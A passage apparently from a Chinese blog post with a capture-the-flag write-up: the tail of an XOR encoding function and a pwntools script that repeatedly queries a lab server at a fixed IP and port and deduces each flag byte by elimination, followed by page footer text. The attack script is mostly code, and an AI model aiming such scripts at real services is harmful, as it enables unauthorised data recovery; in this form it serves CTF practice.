enc = ord(c) ^ enc  # 唯独不可能与0b11111111异或
res += hex(enc)[2:].rjust(2, "0")  # 补齐两位
return res


from pwn import *

p = remote('172.16.30.220', 58005)  # 记得改ip 端口
key = 255

p.sendlineafter('>> ', '3')  # 模式3
p.sendlineafter('key >> ', '255')  # 输入key值
p.recvuntil('result : ')  # 准备接受enc(flag, key)

enc_flag = p.recvline()
flag_len = len(enc_flag) // 2
flag_set = [list(range(256)) for _ in range(flag_len)]  # 存放每一位可能的flag_enc
flag = [0 for x in range(flag_len)]  # flag初始化为一串0

while True:
p.sendlineafter('>> ', '3')
p.sendlineafter('key >> ', '255')
p.recvuntil('result : ')

enc_flag = bytes.fromhex(p.recvline()[:-1].decode())

for i in range(flag_len):
if flag_set[i].count(enc_flag[i]) == 1:
flag_set[i].remove(enc_flag[i])

if len(flag_set[i]) == 1:
flag[i] = chr(flag_set[i][-1] ^ key)

print([len(x) for x in flag_set])

if 0 not in flag:  # 校验完毕
break

print(''.join(flag))

• 3
点赞
• 5
收藏
觉得还不错? 一键收藏
• 8
评论
06-04
04-25 900
03-23 512
12-03 692
10-12
05-13
12-28 4580

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。